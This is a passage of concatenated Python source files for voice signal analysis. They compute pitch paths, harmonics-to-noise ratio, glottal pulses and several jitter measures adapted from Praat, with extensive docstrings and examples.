cost = 0
cur_unvoiced = cur_val == inf or cur_val < min_place_poss2
prev_unvoiced = prev_val == inf or prev_val < min_place_poss2
if cur_unvoiced:
#both voiceless
if prev_unvoiced:
cost = 0
#voiced-to-unvoiced transition
else:
cost = voiced_unvoiced_cost
else:
#unvoiced-to-voiced transition
if prev_unvoiced:
cost = voiced_unvoiced_cost
#both are voiced
else:
cost = octave_jump_cost * abs( log( cur_val /
prev_val ) )
#The cost for any given candidate is given by the transition
#cost, minus the strength of the given candidate
value = prev_delta - cost + cur_delta
if value > maximum: maximum, best_val = value, cur_val
prev_delta = maximum
total_path.append( best_val )
level += 1
if maximum > best_total_cost:
best_total_cost, best_total_path = maximum, total_path
f_0_forth = np.array( best_total_path )
#Calculates smallest costing path through list of candidates ( backwards ),
#and returns path. Going through the path backwards introduces frequencies
#previously marked as unvoiced, or increases undertones, to decrease
#frequency jumps
best_total_cost, best_total_path2 = -inf, []
#Starting at the end, for each initial candidate find the path of least
#cost, then of those paths, choose the one with the least cost.
for cand in range( len( best_cands[ -1 ] ) ):
start_val = best_cands[ -1 ][ cand ]
total_path = [ start_val ]
level = len( best_cands ) - 2
prev_delta = strengths[ -1 ][ cand ]
maximum = -inf
while level > -1 :
prev_val = total_path[ -1 ]
best_val = inf
for j in range( len( best_cands[ level ] ) ):
cur_val = best_cands[ level ][ j ]
cur_delta = strengths[ level ][ j ]
cost = 0
cur_unvoiced = cur_val == inf or cur_val < min_place_poss2
prev_unvoiced = prev_val == inf or prev_val < min_place_poss2
if cur_unvoiced:
#both voiceless
if prev_unvoiced:
cost = 0
#voiced-to-unvoiced transition
else:
cost = voiced_unvoiced_cost
else:
#unvoiced-to-voiced transition
if prev_unvoiced:
cost = voiced_unvoiced_cost
#both are voiced
else:
cost = octave_jump_cost * abs( log( cur_val /
prev_val ) )
#The cost for any given candidate is given by the transition
#cost, minus the strength of the given candidate
value = prev_delta - cost + cur_delta
if value > maximum: maximum, best_val = value, cur_val
prev_delta = maximum
total_path.append( best_val )
level -= 1
if maximum > best_total_cost:
best_total_cost, best_total_path2 = maximum, total_path
f_0_back = np.array( best_total_path2 )
#reversing f_0_backward so the initial value corresponds to first frequency
f_0_back = f_0_back[ -1 : : -1 ]
#choose the maximum frequency from each path for the total path
f_0 = np.array( [ min( i, j ) for i, j in zip( f_0_forth, f_0_back ) ] )
if pulse:
#removing all unvoiced time intervals from list
removed = 0
for i in range( len( f_0 ) ):
if f_0[ i ] > max_place_poss or f_0[ i] < min_place_poss:
time_vals.remove( time_vals[ i - removed ] )
removed += 1
for i in range( len( f_0 ) ):
#if f_0 is voiceless assign occurance of peak to inf -> when divided
#by one this will give us a frequency of 0, corresponding to a unvoiced
#frame
if f_0[ i ] > max_place_poss or f_0[ i ] < min_place_poss :
f_0[ i ] = inf
f_0 = f_0[ f_0 < inf ]
if pulse:
return [ np.median( 1.0 / f_0 ), list( f_0 ), time_vals, signal ]
if len( f_0 ) == 0:
return [ 0 ]
else:
return [ np.median( 1.0 / f_0 ) ]
def get_HNR( signal, rate, time_step = 0, min_pitch = 75,
silence_threshold = .1, periods_per_window = 4.5 ):
"""
Computes mean Harmonics-to-Noise ratio ( HNR ).
The Harmonics-to-Noise ratio ( HNR ) is the ratio
of the energy of a periodic signal, to the energy of the noise in the
signal, expressed in dB. This value is often used as a measure of
hoarseness in a person's voice. By way of illustration, if 99% of the
energy of the signal is in the periodic part and 1% of the energy is in
noise, then the HNR is :math:`10 \cdot log_{10}( \\frac{99}{1} ) = 20`.
A HNR of 0 dB means there is equal energy in harmonics and in noise. The
first step for HNR determination of a signal, in the context of this
algorithm, is to set the maximum frequency allowable to the signal's
Nyquist Frequency. Then the signal is segmented into frames of length
:math:`\\frac{periods\_per\_window}{min\_pitch}`. Then for each frame, it
calculates the normalized autocorrelation ( :math:`r_a` ), or the
correlation of the signal to a delayed copy of itself. :math:`r_a` is
calculated according to Boersma's paper ( referenced below ). The highest
peak is picked from :math:`r_a`. If the height of this peak is larger than
the strength of the silent candidate, then the HNR for this frame is
calculated from that peak. The height of the peak corresponds to the energy
of the periodic part of the signal. Once the HNR value has been calculated
for all voiced frames, the mean is taken from these values and returned.
This algorithm is adapted from:
http://www.fon.hum.uva.nl/david/ba_shs/2010/Boersma_Proceedings_1993.pdf
and from:
https://github.com/praat/praat/blob/master/fon/Sound_to_Harmonicity.cpp
.. note::
The Harmonics-to-Noise ratio of a person's voice is strongly negatively
correlated to depression severity ( described in:
https://ll.mit.edu/mission/cybersec/publications/publication-files/full_papers/2012_09_09_MalyskaN_Interspeech_FP.pdf )
and can be used as an early indicator of depression, and suicide risk.
After this indicator has been realized, preventative medicine can be
implemented, improving recovery time or even preventing further
symptoms.
Args:
signal ( numpy.ndarray ): This is the signal the HNR will be calculated from.
rate ( int ): This is the number of samples taken per second.
time_step ( float ): ( optional, default value: 0.0 ) This is the measurement, in seconds, of time passing between each frame. The smaller the time_step, the more overlap that will occur. If 0 is supplied, the degree of oversampling will be equal to four.
min_pitch ( float ): ( optional, default value: 75 ) This is the minimum value to be returned as pitch, which cannot be less than or equal to zero
silence_threshold ( float ): ( optional, default value: 0.1 ) Frames that do not contain amplitudes above this threshold ( relative to the global maximum amplitude ), are considered silent.
periods_per_window ( float ): ( optional, default value: 4.5 ) 4.5 is best for speech. The more periods contained per frame, the more the algorithm becomes sensitive to dynamic changes in the signal.
Returns:
float: The mean HNR of the signal expressed in dB.
Raises:
ValueError: min_pitch has to be greater than zero.
ValueError: silence_threshold isn't in [ 0, 1 ].
Example:
The example below adjusts parameters of the function, using the same
synthesized signal with added noise, to demonstrate the stability of
the function.
>>> import numpy as np
>>> from matplotlib import pyplot as plt
>>> domain = np.linspace( 0, 6, 300000 )
>>> rate = 50000
>>> y = lambda x:( 1 + .3 * np.sin( 2 * np.pi * 140 * x ) ) * np.sin(
2 * np.pi * 140 * x )
>>> signal = y( domain ) + .2 * np.random.random( 300000 )
>>> get_HNR( signal, rate )
21.885338007330802
>>> get_HNR( signal, rate, periods_per_window = 6 )
21.866307805597849
>>> get_HNR( signal, rate, time_step = .04, periods_per_window = 6 )
21.878451649148804
We'd expect an increase in noise to reduce HNR and similar energies
in noise and harmonics to produce a HNR that approaches zero. This is
demonstrated below.
>>> signals = [ y( domain ) + i / 10.0 * np.random.random( 300000 ) for
i in range( 1, 11 ) ]
>>> HNRx10 = [ get_HNR( sig, rate ) for sig in signals ]
>>> plt.plot( np.linspace( .1, 1, 10 ), HNRx10 )
>>> plt.xlabel( "Amount of Added Noise" )
>>> plt.ylabel( "HNR" )
>>> plt.title( "HNR Values of Signals with Added Noise" )
>>> plt.show()
.. figure:: figures/HNR_values_added_noise.png
:align: center
"""
#checking to make sure values are valid
if min_pitch <= 0:
raise ValueError( "min_pitch has to be greater than zero." )
if silence_threshold < 0 or silence_threshold > 1:
raise ValueError( "silence_threshold isn't in [ 0, 1 ]." )
#degree of overlap is four
if time_step <= 0: time_step = ( periods_per_window / 4.0 ) / min_pitch
Nyquist_Frequency = rate / 2.0
max_pitch = Nyquist_Frequency
global_peak = max( abs( signal - signal.mean() ) )
window_len = periods_per_window / float( min_pitch )
#finding number of samples per frame and time_step
frame_len = int( window_len * rate )
t_len = int( time_step * rate )
#segmenting signal, there has to be at least one frame
num_frames = max( 1, int( len( signal ) / t_len + .5 ) )
seg_signal = [ signal[ int( i * t_len ) : int( i * t_len ) + frame_len ]
for i in range( num_frames + 1 ) ]
#initializing list of candidates for HNR
best_cands = []
for index in range( len( seg_signal ) ):
segment = seg_signal[ index ]
#ignoring any potential empty segment
if len( segment) > 0:
window_len = len( segment ) / float( rate )
#calculating autocorrelation, based off steps 3.2-3.10
segment = segment - segment.mean()
local_peak = max( abs( segment ) )
if local_peak == 0 :
best_cands.append( .5 )
else:
intensity = local_peak / global_peak
window = np.hanning( len( segment ) )
segment *= window
N = len( segment )
nsampFFT = 2 ** int( np.log2( N ) + 1 )
window = np.hstack( ( window, np.zeros( nsampFFT - N ) ) )
segment = np.hstack( ( segment, np.zeros( nsampFFT - N ) ) )
x_fft = np.fft.fft( segment )
r_a = np.real( np.fft.fft( x_fft * np.conjugate( x_fft ) ) )
r_a = r_a[ : N ]
r_a = np.nan_to_num( r_a )
x_fft = np.fft.fft( window )
r_w = np.real( np.fft.fft( x_fft * np.conjugate( x_fft ) ) )
r_w = r_w[ : N ]
r_w = np.nan_to_num( r_w )
r_x = r_a / r_w
r_x /= r_x[ 0 ]
#creating an array of the points in time corresponding to the
#sampled autocorrelation of the signal ( r_x )
time_array = np.linspace( 0, window_len, len( r_x ) )
i = pu.indexes( r_x )
max_values, max_places = r_x[ i ], time_array[ i ]
max_place_poss = 1.0 / min_pitch
min_place_poss = 1.0 / max_pitch
max_values = max_values[ max_places >= min_place_poss ]
max_places = max_places[ max_places >= min_place_poss ]
max_values = max_values[ max_places <= max_place_poss ]
max_places = max_places[ max_places <= max_place_poss ]
for i in range( len( max_values ) ):
#reflecting values > 1 through 1.
if max_values[ i ] > 1.0 :
max_values[ i ] = 1.0 / max_values[ i ]
#eq. 23 and 24 with octave_cost, and voicing_threshold set to zero
if len( max_values ) > 0:
strengths = [ max( max_values ), max( 0, 2 - ( intensity /
( silence_threshold ) ) ) ]
#if the maximum strength is the unvoiced candidate, then .5
#corresponds to HNR of 0
if np.argmax( strengths ):
best_cands.append( 0.5 )
else:
best_cands.append( strengths[ 0 ] )
else:
best_cands.append( 0.5 )
best_cands = np.array( best_cands )
best_cands = best_cands[ best_cands > 0.5 ]
if len(best_cands) == 0:
return 0
#eq. 4
best_cands = 10.0 * np.log10( best_cands / ( 1.0 - best_cands ) )
best_candidate = np.mean( best_cands )
return best_candidate
def get_Pulses( signal, rate, min_pitch = 75, max_pitch = 600,
include_max = False, include_min = True ):
"""
Computes glottal pulses of a signal.
This algorithm relies on the voiced/unvoiced decisions and fundamental
frequencies, calculated for each voiced frame by get_F_0. For every voiced
interval, a list of points is created by finding the initial point
:math:`t_1`, which is the absolute extremum ( or the maximum/minimum,
depending on your include_max and include_min parameters ) of the amplitude
of the sound in the interval
:math:`[\ t_{mid} - \\frac{T_0}{2},\ t_{mid} + \\frac{T_0}{2}\ ]`, where
:math:`t_{mid}` is the midpoint of the interval, and :math:`T_0` is the
period at :math:`t_{mid}`, as can be linearly interpolated from the periods
acquired from get_F_0. From this point, the algorithm searches for points
:math:`t_i` to the left until we reach the left edge of the interval. These
points are the absolute extrema ( or the maxima/minima ) in the interval
:math:`[\ t_{i-1} - 1.25 \cdot T_{i-1},\ t_{i-1} - 0.8 \cdot T_{i-1}\ ]`,
with :math:`t_{i-1}` being the last found point, and :math:`T_{i-1}` the
period at this point. The same is done to the right of :math:`t_1`. The
points are returned in consecutive order.
This algorithm is adapted from:
https://pdfs.semanticscholar.org/16d5/980ba1cf168d5782379692517250e80f0082.pdf
and from:
https://github.com/praat/praat/blob/master/fon/Sound_to_PointProcess.cpp
.. note::
This algorithm is a helper function for the jitter algorithm, that
returns a list of points in the time domain corresponding to minima or
maxima of the signal. These minima or maxima are the sequence of
glottal closures in vocal-fold vibration. The distance between
consecutive pulses is defined as the wavelength of the signal at this
interval, which can be used to later calculate jitter.
Args:
signal ( numpy.ndarray ): This is the signal the glottal pulses will be calculated from.
rate ( int ): This is the number of samples taken per second.
min_pitch ( float ): ( optional, default value: 75 ) This is the minimum value to be returned as pitch, which cannot be less than or equal to zero
max_pitch ( float ): ( optional, default value: 600 ) This is the maximum value to be returned as pitch, which cannot be greater than Nyquist Frequency
include_max ( bool ): ( optional, default value: False ) This determines if maxima values will be used when calculating pulses
include_min ( bool ): ( optional, default value: True ) This determines if minima values will be used when calculating pulses
Returns:
numpy.ndarray: This is an array of points in a time series that
correspond to the signal's periodicity.
Raises:
ValueError: include_min and include_max can't both be False
Example:
Pulses are calculated for a synthesized signal, and the variation in
time between each pulse is shown.
>>> import numpy as np
>>> from matplotlib import pyplot as plt
>>> domain = np.linspace( 0, 6, 300000 )
>>> y = lambda x:( 1 + .3 * np.sin( 2 * np.pi * 140 * x ) ) * np.sin(
2 * np.pi * 140 * x )
>>> signal = y( domain ) + .2 * np.random.random( 300000 )
>>> rate = 50000
>>> p = get_Pulses( signal, rate )
>>> print( p[ :5 ] )
[ 0.00542001 0.01236002 0.01946004 0.02702005 0.03402006 ]
>>> print( np.diff( p[ :6 ] ) )
[ 0.00694001 0.00710001 0.00756001 0.00700001 0.00712001 ]
>>> p = get_Pulses( signal, rate, include_max = True )
>>> print( p[ :5 ] )
[ 0.00886002 0.01608003 0.02340004 0.03038006 0.03732007 ]
>>> print( np.diff( p[ :6 ] ) )
[ 0.00722001 0.00732001 0.00698001 0.00694001 0.00734001 ]
A synthesized signal, with an increasing frequency, and the calculated
pulses of that signal are plotted together to demonstrate the
algorithms ability to adapt to dynamic pulses.
>>> domain = np.linspace( 1.85, 2.05, 10000 )
>>> rate = 50000
>>> y = lambda x : np.sin( x ** 8 )
>>> signal = np.hstack( ( np.zeros( 2500 ), y( domain[ 2500: -2500 ] ),
np.zeros( 2500 ) ) )
>>> pulses = get_Pulses( signal, rate )
>>> plt.plot( domain, signal, 'r', alpha = .5, label = "Signal" )
>>> plt.plot( ( 1.85 + pulses[ 0 ] ) * np.ones ( 5 ),
np.linspace( -1, 1, 5 ), 'b', alpha = .5, label = "Pulses" )
>>> plt.legend()
>>> for pulse in pulses[ 1: ]:
>>> plt.plot( ( 1.85 + pulse ) * np.ones ( 5 ),
np.linspace( -1, 1, 5 ), 'b', alpha = .5 )
>>> plt.xlabel( "Samples" )
>>> plt.ylabel( "Amplitude" )
>>> plt.title( "Signal with Pulses, Calculated from Minima of Signal" )
>>> plt.show()
.. figure:: figures/Pulses_sig.png
:align: center
"""
#first calculate F_0 estimates for each voiced interval
add = np.hstack
if not include_max and not include_min:
raise ValueError( "include_min and include_max can't both be False" )
median, period, intervals, signal = get_F_0( signal, rate,
min_pitch = min_pitch,
max_pitch = max_pitch,
pulse = True )
global_peak = max( abs( signal - signal.mean() ) )
#points will be a list of points where pulses occur, voiced_intervals will
#be a list of tuples consisting of voiced intervals with overlap
#eliminated
points, voiced_intervals = [], []
#f_times will be an array of times corresponding to our given frequencies,
#to be used for interpolating, v_time be an array consisting of all the
#points in time that are voiced
f_times, v_time = np.array( [] ), np.array( [] )
total_time = np.linspace( 0, len( signal ) / float( rate ), len( signal ) )
for interval in intervals:
start, stop = interval
#finding all midpoints for each interval
f_times = add( ( f_times, ( start + stop ) / 2.0 ) )
i = 0
while i < len( intervals ) - 1 :
start, stop = intervals[ i ]
i_start, prev_stop = intervals[ i ]
#while there is overlap, look to the next interval
while start <= prev_stop and i < len( intervals ) - 1 :
prev_start, prev_stop = intervals[ i ]
i += 1
start, stop = intervals[ i ]
if i == len( intervals ) - 1:
samp = int ( ( stop - i_start ) * rate )
v_time = add( ( v_time, np.linspace( i_start, stop, samp ) ) )
voiced_intervals.append( ( i_start, stop ) )
else:
samp = int ( ( prev_stop - i_start ) * rate )
v_time = add( ( v_time, np.linspace( i_start, prev_stop, samp ) ) )
voiced_intervals.append( ( i_start, prev_stop ) )
#interpolate the periods so that each voiced point has a corresponding
#period attached to it
periods_interp = np.interp( v_time, f_times, period )
for interval in voiced_intervals:
start, stop = interval
midpoint = ( start + stop ) / 2.0
#out of all the voiced points, look for index of the one that is
#closest to our calculated midpoint
midpoint_index = np.argmin( abs( v_time - midpoint ) )
midpoint = v_time[ midpoint_index ]
T_0 = periods_interp[ midpoint_index ]
frame_start = midpoint - T_0
frame_stop = midpoint + T_0
#finding points, start by looking to the left of the center of the
#voiced interval
while frame_start > start :
#out of all given time points in signal, find index of closest to
#start and stop
frame_start_index = np.argmin( abs( total_time - frame_start ) )
frame_stop_index = np.argmin( abs( total_time - frame_stop ) )
frame = signal[ frame_start_index : frame_stop_index ]
if include_max and include_min:
p_index = np.argmax( abs( frame ) ) + frame_start_index
elif include_max:
p_index = np.argmax( frame ) + frame_start_index
else:
p_index = np.argmin( frame ) + frame_start_index
if abs( signal[ p_index ] ) > .02333 * global_peak:
points.append( total_time[ p_index ] )
t = total_time[ p_index ]
t_index = np.argmin( abs( v_time - t ) )
T_0 = periods_interp[ t_index ]
frame_start = t - 1.25 * T_0
frame_stop = t - 0.80 * T_0
T_0 = periods_interp[ midpoint_index ]
frame_start = midpoint - T_0
frame_stop = midpoint + T_0
#finding points by now looking to the right of the center of the
#voiced interval
while frame_stop < stop :
#out of all given time points in signal, find index of closest to
#start and stop
frame_start_index = np.argmin( abs( total_time - frame_start ) )
frame_stop_index = np.argmin( abs( total_time - frame_stop ) )
frame = signal[ frame_start_index : frame_stop_index ]
if include_max and include_min:
p_index = np.argmax( abs( frame ) ) + frame_start_index
elif include_max:
p_index = np.argmax( frame ) + frame_start_index
else:
p_index = np.argmin( frame ) + frame_start_index
if abs( signal[ p_index ] ) > .02333 * global_peak:
points.append( total_time[ p_index ] )
t = total_time[ p_index ]
t_index = np.argmin( abs( v_time - t ) )
T_0 = periods_interp[ t_index ]
frame_start = t + 0.80 * T_0
frame_stop = t + 1.25 * T_0
#returning an ordered array of points with any duplicates removed
return np.array( sorted( list( set( points ) ) ) )
def get_Jitter( signal, rate, period_floor = .0001, period_ceiling = .02,
max_period_factor = 1.3 ):
"""
Compute Jitter.
Jitter is the measurement of random pertubations in period length. For most
accurate jitter measurements, calculations are typically performed on long
sustained vowels. This algorithm calculates 5 different types of jitter for
all voiced intervals. Each different type of jitter describes different
characteristics of the period pertubations. The 5 types of jitter
calculated are absolute jitter, relative jitter, relative average
perturbation ( rap ), the 5-point period pertubation quotient ( ppq5 ), and
the difference of differences of periods ( ddp ).\n
Absolute jitter is defined as the cycle-to-cycle variation of
fundamental frequency, or in other words, the average absolute difference
between consecutive periods.
.. math::
\\frac{1}{N-1}\sum_{i=1}^{N-1}|T_i-T_{i-1}|
Relative jitter is defined as the average absolute difference between
consecutive periods ( absolute jitter ), divided by the average period.
.. math::
\\frac{\\frac{1}{N-1}\sum_{i=1}^{N-1}|T_i-T_{i-1}|}{\\frac{1}{N}\sum_{i=1}^N T_i}
Relative average perturbation is defined as the average absolute difference
between a period and the average of it and its two neighbors divided by the
average period.
.. math::
\\frac{\\frac{1}{N-1}\sum_{i=1}^{N-1}|T_i-(\\frac{1}{3}\sum_{n=i-1}^{i+1}T_n)|}{\\frac{1}{N}\sum_{i=1}^N T_i}
The 5-point period pertubation quotient is defined as the average absolute
difference between a period and the average of it and its 4 closest neighbors
divided by the average period.
.. math::
\\frac{\\frac{1}{N-1}\sum_{i=2}^{N-2}|T_i-(\\frac{1}{5}\sum_{n=i-2}^{i+2}T_n)|}{\\frac{1}{N}\sum_{i=1}^N T_i}
The difference of differences of periods is defined as the relative mean
absolute second-order difference of periods, which is equivalent to 3 times
rap.
.. math::
\\frac{\\frac{1}{N-2}\sum_{i=2}^{N-1}|(T_{i+1}-T_i)-(T_i-T_{i-1})|}{\\frac{1}{N}\sum_{i=1}^{N}T_i}
After each type of jitter has been calculated the values are
returned in a dictionary.
.. warning::
This algorithm has 4.2% relative error when compared to Praat's values.
This algorithm is adapted from:
http://www.lsi.upc.edu/~nlp/papers/far_jit_07.pdf
and from:
http://ac.els-cdn.com/S2212017313002788/1-s2.0-S2212017313002788-main.pdf?_tid=0c860a76-7eda-11e7-a827-00000aab0f02&acdnat=1502486243_009951b8dc70e35597f4cd19f8e05930
and from:
https://github.com/praat/praat/blob/master/fon/VoiceAnalysis.cpp
.. note::
Significant differences can occur in jitter and shimmer measurements
between different speaking styles, these differences make it possible to
use jitter as a feature for speaker recognition ( referenced above ).
Args:
signal ( numpy.ndarray ): This is the signal the jitter will be calculated from.
rate ( int ): This is the number of samples taken per second.
period_floor ( float ): ( optional, default value: .0001 ) This is the shortest possible interval that will be used in the computation of jitter, in seconds. If an interval is shorter than this, it will be ignored in the computation of jitter ( the previous and next intervals will not be regarded as consecutive ).
period_ceiling ( float ): ( optional, default value: .02 ) This is the longest possible interval that will be used in the computation of jitter, in seconds. If an interval is longer than this, it will be ignored in the computation of jitter ( the previous and next intervals will not be regarded as consecutive ).
max_period_factor ( float ): ( optional, default value: 1.3 ) This is the largest possible difference between consecutive intervals that will be used in the computation of jitter. If the ratio of the durations of two consecutive intervals is greater than this, this pair of intervals will be ignored in the computation of jitter ( each of the intervals could still take part in the computation of jitter, in a comparison with its neighbor on the other side ).
Returns:
dict: a dictionary with keys: 'local', 'local, absolute', 'rap',
'ppq5', and 'ddp'. The values correspond to each type of jitter.\n
local jitter is expressed as a ratio of mean absolute period variation
to the mean period. \n
local absolute jitter is given in seconds.\n
rap is expressed as a ratio of the mean absolute difference between a
period and the mean of its 2 neighbors to the mean period.\n
ppq5 is expressed as a ratio of the mean absolute difference between a
period and the mean of its 4 neighbors to the mean period.\n
ddp is expressed as a ratio of the mean absolute second-order
difference to the mean period.
Example:
In the example below a synthesized signal is used to demonstrate random
perturbations in periods, and how get_Jitter responds.
>>> import numpy as np
>>> domain = np.linspace( 0, 6, 300000 )
>>> y = lambda x:( 1 - .3 * np.sin( 2 * np.pi * 140 * x ) ) * np.sin(
2 * np.pi * 140 * x )
>>> signal = y( domain ) + .2 * np.random.random( 300000 )
>>> rate = 50000
>>> get_Jitter( signal, rate )
{ 'ddp': 0.047411037373434134,
'local': 0.02581897560637415,
'local, absolute': 0.00018442618908563846,
'ppq5': 0.014805010237029443,
'rap': 0.015803679124478043 }
>>> get_Jitter( signal, rate, period_floor = .001,
period_ceiling = .01, max_period_factor = 1.05 )
{ 'ddp': 0.03264516540374475,
'local': 0.019927260366800197,
'local, absolute': 0.00014233584195389132,
'ppq5': 0.011472274162612033,
'rap': 0.01088172180124825 }
>>> y = lambda x:( 1 - .3 * np.sin( 2 * np.pi * 140 * x ) ) * np.sin(
2 * np.pi * 140 * x )
>>> signal = y( domain )
>>> get_Jitter( signal, rate )
{ 'ddp': 0.0015827628114371581,
'local': 0.00079043477724730755,
'local, absolute': 5.6459437833161522e-06,
'ppq5': 0.00063462518488944565,
'rap': 0.00052758760381238598 }
"""
pulses = get_Pulses( signal, rate )
periods = np.diff( pulses )
min_period_factor = 1.0 / max_period_factor
#finding local, absolute
#described at:
#http://www.fon.hum.uva.nl/praat/manual/PointProcess__Get_jitter__local__absolute____.html
sum_total = 0
num_periods = len( pulses ) - 1
for i in range( len( periods ) - 1 ):
p1, p2 = periods[ i ], periods[ i + 1 ]
ratio = p2 / p1
if (ratio < max_period_factor and ratio > min_period_factor and
p1 < period_ceiling and p1 > period_floor and
p2 < period_ceiling and p2 > period_floor ):
sum_total += abs( periods[ i + 1 ] - periods[ i ] )
else: num_periods -= 1
absolute = sum_total / ( num_periods - 1 )
#finding local,
#described at:
#http://www.fon.hum.uva.nl/praat/manual/PointProcess__Get_jitter__local____.html
sum_total = 0
num_periods = 0
#duplicating edges so there is no need to test edge cases
periods = np.hstack( ( periods[ 0 ], periods, periods[ -1 ] ) )
for i in range( len( periods ) - 2):
p1, p2, p3 = periods[ i ], periods[ i + 1 ], periods[ i + 2 ]
ratio_1, ratio_2 = p1 / p2, p2 / p3
if (ratio_1 < max_period_factor and ratio_1 > min_period_factor and
ratio_2 < max_period_factor and ratio_2 > min_period_factor and
p2 < period_ceiling and p2 > period_floor ):
sum_total += p2
num_periods += 1
#removing duplicated edges
periods = periods[ 1 : -1 ]
avg_period = sum_total / ( num_periods )
relative = absolute / avg_period
#finding rap
#described at:
#http://www.fon.hum.uva.nl/praat/manual/PointProcess__Get_jitter__rap____.html
sum_total = 0
num_periods = 0
for i in range( len( periods ) - 2 ):
p1, p2, p3 = periods[ i ], periods[ i + 1 ], periods[ i + 2 ]
ratio_1, ratio_2 = p1 / p2, p2 / p3
if (ratio_1 < max_period_factor and ratio_1 > min_period_factor and
ratio_2 < max_period_factor and ratio_2 > min_period_factor and
p1 < period_ceiling and p1 > period_floor and
p2 < period_ceiling and p2 > period_floor and
p3 < period_ceiling and p3 > period_floor ):
sum_total += abs( p2 - ( p1 + p2 + p3 ) / 3.0 )
num_periods += 1
rap = ( sum_total / num_periods ) / avg_period
#finding ppq5
#described at:
#http://www.fon.hum.uva.nl/praat/manual/PointProcess__Get_jitter__ppq5____.html
sum_total = 0
num_periods = 0
for i in range( len( periods ) - 4 ):
p1, p2, p3 = periods[ i ], periods[ i + 1 ], periods[ i + 2 ]
p4, p5 = periods[ i + 3 ], periods[ i + 4 ]
ratio_1, ratio_2, ratio_3, ratio_4 = p1 / p2, p2 / p3, p3 / p4, p4 / p5
if (ratio_1 < max_period_factor and ratio_1 > min_period_factor and
ratio_2 < max_period_factor and ratio_2 > min_period_factor and
ratio_3 < max_period_factor and ratio_3 > min_period_factor and
ratio_4 < max_period_factor and ratio_4 > min_period_factor and
p1 < period_ceiling and p1 > period_floor and
p2 < period_ceiling and p2 > period_floor and
p3 < period_ceiling and p3 > period_floor and
p4 < period_ceiling and p4 > period_floor and
p5 < period_ceiling and p5 > period_floor ):
sum_total += abs( p3 - ( p1 + p2 + p3 +p4 + p5 ) / 5.0 )
num_periods += 1
ppq5 = ( sum_total / num_periods ) / avg_period
#Praat calculates ddp by multiplying rap by 3
#described at:
#http://www.fon.hum.uva.nl/praat/manual/PointProcess__Get_jitter__ddp____.html
return { 'local' : relative, 'local, absolute' : absolute, 'rap' : rap,
'ppq5' : ppq5, 'ddp' : 3 * rap }
```
#### File: surfboard/surfboard/jitters.py
```python
import numpy as np
from .utils import (
shifted_sequence,
)
def validate_frequencies(frequencies, p_floor, p_ceil, max_p_factor):
"""Given a sequence of frequencies, [f1, f2, ..., fn], a minimum period,
maximum period, and maximum period factor, first remove all frequencies computed as 0.
Then, if periods are the inverse frequencies, this function returns
True if the sequence of periods satisfies the conditions, otherwise
returns False. In order to satisfy the maximum period factor, the periods
have to satisfy pi / pi+1 < max_p_factor and pi+1 / pi < max_p_factor.
Args:
frequencies (sequence, eg list, of floats): sequence of frequencies == 1 / period.
p_floor (float): minimum acceptable period.
p_ceil (float): maximum acceptable period.
max_p_factor (float): value to use for the period factor principle
Returns:
bool: True if the conditions are met, False otherwise.
"""
for freq in frequencies:
if freq == 0:
return False
periods = [1 / f for f in frequencies]
for period in periods:
if period < p_floor or period > p_ceil:
return False
if len(periods) > 1 and max_p_factor is not None:
for period1, period2 in zip(periods[:-1], periods[1:]):
if period1 / period2 > max_p_factor or period2 / period1 > max_p_factor:
return False
return True
def get_mean_period(frequencies, p_floor, p_ceil, max_p_factor):
"""Given a sequence of frequencies, passes these through the validation phase,
then computes the mean of the remaining periods. Note period = 1/f.
Args:
frequencies (sequence, eg list, of floats): sequence of frequencies
p_floor (float): minimum acceptable period.
p_ceil (float): maximum acceptable period.
max_p_factor (float): value to use for the period factor principle
Returns:
float: The mean of the acceptable periods.
"""
cumsum = 0
counter = 0
for freq in frequencies:
if validate_frequencies([freq], p_floor, p_ceil, max_p_factor):
cumsum += 1 / freq
counter += 1
mean_period = cumsum / counter if counter != 0 else None
return mean_period
def get_local_absolute_jitter(frequencies, p_floor, p_ceil, max_p_factor):
"""Given a sequence of frequencies, and some period conditions,
compute the local absolute jitter, as per
https://royalsocietypublishing.org/action/downloadSupplement?doi=10.1098%2Frsif.2010.0456&file=rsif20100456supp1.pdf
Args:
frequencies (sequence, eg list, of floats): sequence of estimated frequencies
p_floor (float): minimum acceptable period.
p_ceil (float): maximum acceptable period.
max_p_factor (float): value to use for the period factor principle
Returns:
float: the local absolute jitter.
"""
cumsum = 0
counter = 0
for pair in shifted_sequence(frequencies, 2):
freq1, freq2 = pair
if validate_frequencies([freq1, freq2], p_floor, p_ceil, max_p_factor):
counter += 1
cumsum += np.abs((1 / freq1) - (1 / freq2))
return cumsum / counter if counter != 0 else None
def get_local_jitter(frequencies, p_floor, p_ceil, max_p_factor):
"""Given a sequence of frequencies, and some period conditions, compute the local
jitter, as per https://royalsocietypublishing.org/action/downloadSupplement?doi=10.1098%2Frsif.2010.0456&file=rsif20100456supp1.pdf
Args:
frequencies (sequence, eg list, of floats): sequence of estimated frequencies
p_floor (float): minimum acceptable period.
p_ceil (float): maximum acceptable period.
max_p_factor (float): value to use for the period factor principle
Returns:
float: the local jitter.
"""
mean_period = get_mean_period(frequencies, p_floor, p_ceil, max_p_factor)
local_absolute_jitter = get_local_absolute_jitter(frequencies, p_floor, p_ceil, max_p_factor)
if mean_period is not None and local_absolute_jitter is not None:
return local_absolute_jitter / mean_period if mean_period != 0 else None
return None
def get_rap_jitter(frequencies, p_floor, p_ceil, max_p_factor):
"""Given a sequence of frequencies, and some period conditions,
compute the rap jitter, as per
https://royalsocietypublishing.org/action/downloadSupplement?doi=10.1098%2Frsif.2010.0456&file=rsif20100456supp1.pdf
Args:
frequencies (sequence, eg list, of floats): sequence of estimated frequencies
p_floor (float): minimum acceptable period.
p_ceil (float): maximum acceptable period.
max_p_factor (float): value to use for the period factor principle
Returns:
float: the rap jitter.
"""
counter = 0
cumsum = 0
mean_period = get_mean_period(frequencies, p_floor, p_ceil, max_p_factor)
for freq1, freq2, freq3 in shifted_sequence(frequencies, 3):
if validate_frequencies([freq1, freq2, freq3], p_floor, p_ceil, max_p_factor):
cumsum += np.abs(1 / freq2 - (1 / freq1 + 1 / freq2 + 1 / freq3) / 3)
counter += 1
if counter != 0:
rap_jitter = (cumsum / counter) / mean_period if mean_period != 0 else None
return rap_jitter
return None
def get_ppq5_jitter(frequencies, p_floor, p_ceil, max_p_factor):
"""Given a sequence of frequencies, and some period conditions,
compute the ppq5 jitter, as per
https://royalsocietypublishing.org/action/downloadSupplement?doi=10.1098%2Frsif.2010.0456&file=rsif20100456supp1.pdf
Args:
frequencies (sequence, eg list, of floats): sequence of estimated frequencies
p_floor (float): minimum acceptable period.
